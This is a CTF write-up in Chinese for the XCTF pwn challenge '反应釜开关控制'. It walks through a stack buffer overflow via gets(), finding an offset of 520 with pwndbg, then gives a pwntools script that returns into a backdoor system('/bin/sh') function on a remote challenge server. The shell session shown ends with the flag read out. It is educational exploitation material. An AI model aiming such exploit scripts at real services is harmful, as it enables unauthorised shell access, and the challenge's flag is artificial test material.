攻防世界 反应釜开关控制

反应釜开关控制 栈溢出

反应釜开关控制

(1)

motaly@motaly-VMware-Virtual-Platform:~/桌面$ file pwn
pwn: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=6145840505e7d75d0020a02b556136ce4c936ed9, not stripped
motaly@motaly-VMware-Virtual-Platform:~/桌面$ checksec --file=pwn
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH	Symbols		FORTIFY	Fortified	Fortifiable	FILE
Partial RELRO   No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   73 Symbols	  No	0		2		pwn

(2)

用ida打开，按下F5(如果不行，看看有没有Fn键，Fn+F5)

int __fastcall main(int argc, const char **argv, const char **envp)
{char s[64]; // [rsp+0h] [rbp-240h] BYREF_BYTE v5[512]; // [rsp+40h] [rbp-200h] BYREFwrite(1, "Please closing the reaction kettle\n", 0x23uLL);write(1, "The switch is:", 0xEuLL);sprintf(s, "%p\n", easy);write(1, s, 9uLL);write(1, ">", 2uLL);gets(v5);return 0;
}

看到这里先是有一个easy函数并且程序会输出easy函数地址

然后有gets函数，存在缓冲区溢出

__int64 easy()
{char s[64]; // [rsp+0h] [rbp-1C0h] BYREF_BYTE v2[384]; // [rsp+40h] [rbp-180h] BYREFwrite(1, "You have closed the first switch\n", 0x21uLL);write(1, "Please closing the second reaction kettle\n", 0x2AuLL);write(1, "The switch is:", 0xEuLL);sprintf(s, "%p\n", normal);write(1, s, 9uLL);write(1, ">", 2uLL);return gets(v2);
}

跟前面一样先是有一个normal函数并且程序会输出normal函数地址

然后有gets函数，存在缓冲区溢出

__int64 normal()
{char s[64]; // [rsp+0h] [rbp-140h] BYREF_BYTE v2[256]; // [rsp+40h] [rbp-100h] BYREFwrite(1, "You have closed the first switch\n", 0x22uLL);write(1, "Please closing the third reaction kettle\n", 0x2AuLL);write(1, "The switch is:", 0xEuLL);sprintf(s, "%p\n", shell);write(1, s, 9uLL);write(1, ">", 2uLL);return gets(v2);
}

跟前面一样先是有一个shell函数并且程序会输出shell函数地址

然后有gets函数，存在缓冲区溢出

int shell()
{return system("/bin/sh");
}

在shell函数中看到了连接点

(3)

思路:

总的这个程序虽然每次一层都会泄露下一层函数的地址，最后一层是后门shell函数，但我们可以直接在ida中查看shell函数地址，作为返回地址，然后通过栈溢出进行连接

这里先用pwndbg动态调试

motaly@motaly-VMware-Virtual-Platform:~/桌面$ gdb pwn
GNU gdb (Ubuntu 15.0.50.20240403-0ubuntu1) 15.0.50.20240403-git
Copyright (C) 2024 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:<http://www.gnu.org/software/gdb/documentation/>.For help, type "help".
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 177 pwndbg commands and 46 shell commands. Type pwndbg [--shell | --all] [filter] for a list.
pwndbg: created $rebase, $base, $hex2ptr, $argv, $envp, $argc, $environ, $bn_sym, $bn_var, $bn_eval, $ida GDB functions (can be used with print/break)
Reading symbols from pwn...This GDB supports auto-downloading debuginfo from the following URLs:<https://debuginfod.ubuntu.com>
Debuginfod has been disabled.
To make this setting permanent, add 'set debuginfod enabled off' to .gdbinit.
(No debugging symbols found in pwn)
------- tip of the day (disable with set show-tips off) -------
If your program has multiple threads they will be displayed in the context display or using the context threads command
pwndbg> cyclic 1000
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaaaaacnaaaaaacoaaaaaacpaaaaaacqaaaaaacraaaaaacsaaaaaactaaaaaacuaaaaaacvaaaaaacwaaaaaacxaaaaaacyaaaaaaczaaaaaadbaaaaaadcaaaaaaddaaaaaadeaaaaaadfaaaaaadgaaaaaadhaaaaaadiaaaaaadjaaaaaadkaaaaaadlaaaaaadmaaaaaadnaaaaaadoaaaaaadpaaaaaadqaaaaaadraaaaaadsaaaaaadtaaaaaaduaaaaaadvaaaaaadwaaaaaadxaaaaaadyaaaaaadzaaaaaaebaaaaaaecaaaaaaedaaaaaaeeaaaaaaefaaaaaaegaaaaaaehaaaaaaeiaaaaaaejaaaaaaekaaaaaaelaaaaaaemaaaaaaenaaaaaaeoaaaaaaepaaaaaaeqaaaaaaeraaaaaaesaaaaaaetaaaaaaeuaaaaaaevaaaaaaewaaaaaaexaaaaaaeyaaaaaae
pwndbg> r
Starting program: /home/motaly/桌面/pwn 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Please closing the reaction kettle
The switch is:0x4006b0
>aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaaaaacnaaaaaacoaaaaaacpaaaaaacqaaaaaacraaaaaacsaaaaaactaaaaaacuaaaaaacvaaaaaacwaaaaaacxaaaaaacyaaaaaaczaaaaaadbaaaaaadcaaaaaaddaaaaaadeaaaaaadfaaaaaadgaaaaaadhaaaaaadiaaaaaadjaaaaaadkaaaaaadlaaaaaadmaaaaaadnaaaaaadoaaaaaadpaaaaaadqaaaaaadraaaaaadsaaaaaadtaaaaaaduaaaaaadvaaaaaadwaaaaaadxaaaaaadyaaaaaadzaaaaaaebaaaaaaecaaaaaaedaaaaaaeeaaaaaaefaaaaaaegaaaaaaehaaaaaaeiaaaaaaejaaaaaaekaaaaaaelaaaaaaemaaaaaaenaaaaaaeoaaaaaaepaaaaaaeqaaaaaaeraaaaaaesaaaaaaetaaaaaaeuaaaaaaevaaaaaaewaaaaaaexaaaaaaeyaaaaaaeProgram received signal SIGSEGV, Segmentation fault.
0x00000000004007f1 in main ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
────────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────────────────────────────────────────────────────────RAX  0RBX  0x7fffffffd838 ◂— 'baaaaaaecaaaaaaedaaaaaaeeaaaaaaefaaaaaaegaaaaaaehaaaaaaeiaaaaaaejaaaaaaekaaaaaaelaaaaaaemaaaaaaenaaaaaaeoaaaaaaepaaaaaaeqaaaaaaeraaaaaaesaaaaaaetaaaaaaeuaaaaaaevaaaaaaewaaaaaaexaaaaaaeyaaaaaae'RCX  0x7ffff7e038e0 (_IO_2_1_stdin_) ◂— 0xfbad2288RDX  0RDI  0x7ffff7e05720 (_IO_stdfile_0_lock) ◂— 0RSI  0x6025d0 ◂— 'caaaaaaedaaaaaaeeaaaaaaefaaaaaaegaaaaaaehaaaaaaeiaaaaaaejaaaaaaekaaaaaaelaaaaaaemaaaaaaenaaaaaaeoaaaaaaepaaaaaaeqaaaaaaeraaaaaaesaaaaaaetaaaaaaeuaaaaaaevaaaaaaewaaaaaaexaaaaaaeyaaaaaae\n'R8   0x602689 ◂— 0R9   0R10  1R11  0x246R12  1R13  0R14  0R15  0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe2e0 ◂— 0RBP  0x636161616161616f ('oaaaaaac')RSP  0x7fffffffd718 ◂— 0x6361616161616170 ('paaaaaac')RIP  0x4007f1 (main+152) ◂— ret 
─────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────────────────────────────────────────────────────► 0x4007f1 <main+152>    ret                                <0x6361616161616170>↓───────────────────────────────────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffffffd718 ◂— 0x6361616161616170 ('paaaaaac')
01:0008│     0x7fffffffd720 ◂— 0x6361616161616171 ('qaaaaaac')
02:0010│     0x7fffffffd728 ◂— 0x6361616161616172 ('raaaaaac')
03:0018│     0x7fffffffd730 ◂— 0x6361616161616173 ('saaaaaac')
04:0020│     0x7fffffffd738 ◂— 0x6361616161616174 ('taaaaaac')
05:0028│     0x7fffffffd740 ◂— 0x6361616161616175 ('uaaaaaac')
06:0030│     0x7fffffffd748 ◂— 0x6361616161616176 ('vaaaaaac')
07:0038│     0x7fffffffd750 ◂— 0x6361616161616177 ('waaaaaac')
─────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────────────────────────────────────────────► 0         0x4007f1 main+1521 0x6361616161616170 None2 0x6361616161616171 None3 0x6361616161616172 None4 0x6361616161616173 None5 0x6361616161616174 None6 0x6361616161616175 None7 0x6361616161616176 None
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> cyclic -l 0x6361616161616170
Finding cyclic pattern of 8 bytes: b'paaaaaac' (hex: 0x7061616161616163)
Found at offset 520
=

得到偏移量为520

再去ida中查看shell函数地址

.text:00000000004005F6
.text:00000000004005F6 ; Attributes: bp-based frame
.text:00000000004005F6
.text:00000000004005F6 ; int shell()
.text:00000000004005F6                 public shell
.text:00000000004005F6 shell           proc near               ; DATA XREF: normal+4E↓o
.text:00000000004005F6 ; __unwind {
.text:00000000004005F6                 push    rbp
.text:00000000004005F7                 mov     rbp, rsp
.text:00000000004005FA                 mov     edi, offset command ; "/bin/sh"
.text:00000000004005FF                 call    _system
.text:0000000000400604                 nop
.text:0000000000400605                 pop     rbp
.text:0000000000400606                 retn
.text:0000000000400606 ; } // starts at 4005F6
.text:0000000000400606 shell           endp
.text:0000000000400606
.text:0000000000400607

shell函数地址为0x4005F6

(4)

编写

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
p=remote('223.112.5.141',54755)
# p= process('/home/motaly/桌面/pwn')
sh=0x4005F6
payload=b'a'*520+p64(sh)
p.sendafter(">",payload)
p.interactive()

(5)

连接得到flag

[*] Switching to interactive mode
\x00$ ls
[DEBUG] Sent 0x3 bytes:b'ls\n'
$ ls
[DEBUG] Sent 0x3 bytes:b'ls\n'
[DEBUG] Received 0x23 bytes:b'bin\n'b'blind\n'b'dev\n'b'flag\n'b'lib\n'b'lib32\n'b'lib64\n'
bin
blind
dev
flag
lib
lib32
lib64
$ cat flag
[DEBUG] Sent 0x9 bytes:b'cat flag\n'
[DEBUG] Received 0x2d bytes:b'cyberpeace{38e3269fca57a49f53663fb98883f6d8}\n'
cyberpeace{38e3269fca57a49f53663fb98883f6d8}